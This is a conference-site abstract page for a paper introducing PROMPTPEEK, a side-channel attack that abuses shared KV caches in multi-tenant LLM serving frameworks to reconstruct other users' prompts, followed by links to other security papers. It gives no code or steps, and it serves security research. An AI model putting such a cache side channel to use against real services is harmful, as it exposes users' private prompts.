Guanlong Wu (Southern University of Science and Technology), Zheng Zhang (ByteDance Inc.), Yao Zhang (ByteDance Inc.), Weili Wang (Southern University of Science and Technolog), Jianyu Niu (Southern University of Science and Technolog), Ye Wu (ByteDance Inc.), Yinqian Zhang (Southern University of Science and Technology (SUSTech))

Large Language Models (LLMs), which laid the groundwork for Artificial General Intelligence (AGI), have recently gained significant traction in academia and industry due to their disruptive applications. In order to enable scalable applications and efficient resource management, various multi-tenant LLM serving frameworks have been proposed, in which the LLM caters to the needs of multiple users simultaneously. One notable mechanism in recent works, such as SGLang and vLLM, is sharing the Key-Value (KV) cache for identical token sequences among multiple users, saving both memory and computation. This paper presents the first investigation on security risks
associated with multi-tenant LLM serving. We show that the state-of-the-art mechanisms of KV cache sharing may lead to new side channel attack vectors, allowing unauthorized reconstruction
of user prompts and compromising sensitive user information among mutually distrustful users. Specifically, we introduce our attack, PROMPTPEEK, and apply it to three scenarios where the
adversary, with varying degrees of prior knowledge, is capable of reverse-engineering prompts from other users. This study underscores the need for careful resource management in multi-tenant LLM serving and provides critical insights for future security enhancement.

View More Papers

SCAMMAGNIFIER: Piercing the Veil of Fraudulent Shopping Website Campaigns

Marzieh Bitaab (Arizona State University), Alireza Karimi (Arizona State University), Zhuoer Lyu (Arizona State University), Adam Oest (Amazon), Dhruv Kuchhal (Amazon), Muhammad Saad (X Corp.), Gail-Joon Ahn (Arizona State University), Ruoyu Wang (Arizona State University), Tiffany Bao (Arizona State University), Yan Shoshitaishvili (Arizona State University), Adam Doupé (Arizona State University)

Read More

Do (Not) Follow the White Rabbit: Challenging the Myth...

Soheil Khodayari (CISPA Helmholtz Center for Information Security), Kai Glauber (Saarland University), Giancarlo Pellegrino (CISPA Helmholtz Center for Information Security)

Read More

Security Advice on Content Filtering and Circumvention for Parents...

Ran Elgedawy (The University of Tennessee, Knoxville), John Sadik (The University of Tennessee, Knoxville), Anuj Gautam (The University of Tennessee, Knoxville), Trinity Bissahoyo (The University of Tennessee, Knoxville), Christopher Childress (The University of Tennessee, Knoxville), Jacob Leonard (The University of Tennessee, Knoxville), Clay Shubert (The University of Tennessee, Knoxville), Scott Ruoti (The University of Tennessee,…

Read More

The Forking Way: When TEEs Meet Consensus

Annika Wilde (Ruhr University Bochum), Tim Niklas Gruel (Ruhr University Bochum), Claudio Soriente (NEC Laboratories Europe), Ghassan Karame (Ruhr University Bochum)

Read More